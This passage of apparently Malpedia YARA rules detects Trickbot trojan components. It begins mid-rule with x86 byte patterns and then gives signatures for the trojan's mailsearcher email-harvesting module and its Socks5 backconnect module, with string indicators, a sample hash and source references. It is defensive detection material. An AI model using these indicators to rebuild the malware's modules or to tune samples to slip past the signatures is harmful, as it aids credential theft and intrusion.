            //   8b45f8               | mov                 eax, dword ptr [ebp - 8]
            //   8a4418ff             | mov                 al, byte ptr [eax + ebx - 1]
            //   8b17                 | mov                 edx, dword ptr [edi]
            //   88441aff             | mov                 byte ptr [edx + ebx - 1], al
    condition:
        7 of them and filesize < 18563072
}
[TLP:WHITE] win_trickbot_w0   (20170613 | Detects mailsearcher module from Trickbot Trojan)
rule win_trickbot_w0 {
    meta:
        author = "Marc Salinas @Bondey_m"
        description = "Detects mailsearcher module from Trickbot Trojan"
        reference = "https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf"
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot"
        malpedia_version = "20170613"
        malpedia_license = "CC BY-NC-SA 4.0"
        malpedia_sharing = "TLP:WHITE"
    strings:
        $str_mails_01 = "mailsearcher"
        $str_mails_02 = "handler"
        $str_mails_03 = "conf"
        $str_mails_04 = "ctl"
        $str_mails_05 = "SetConf"
        $str_mails_06 = "file"
        $str_mails_07 = "needinfo"
        $str_mails_08 = "mailconf"
    condition:
        all of ($str_mails_*)
}
[TLP:WHITE] win_trickbot_w1   (20171214 | Trickbot Socks5 bckconnect module)
rule win_trickbot_w1 {
    meta:
        description = "Trickbot Socks5 bckconnect module"
        author = "@VK_Intel"
        reference = "Detects the unpacked Trickbot backconnect in memory"
        date = "2017-11-19"
        hash = "f2428d5ff8c93500da92f90154eebdf0"
        source = "http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html"
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot"
        malpedia_version = "20171214"
        malpedia_license = "CC BY-NC-SA 4.0"
        malpedia_sharing = "TLP:WHITE"
    strings:
        $s0 = "socks5dll.dll" fullword ascii
        $s1 = "auth_login" fullword ascii
        $s2 = "auth_ip" fullword ascii
        $s3 = "connect" fullword ascii
        $s4 = "auth_ip" fullword ascii
        $s5 = "auth_pass" fullword ascii
        $s6 = "thread.entry_event" fullword ascii
        $s7 = "thread.exit_event" fullword ascii
        $s8 = "</moduleconfig>" fullword ascii
        $s9 = "<moduleconfig>" fullword ascii
        $s10 = "<autostart>yes</autostart>" fullword ascii
    condition:
        all of them
}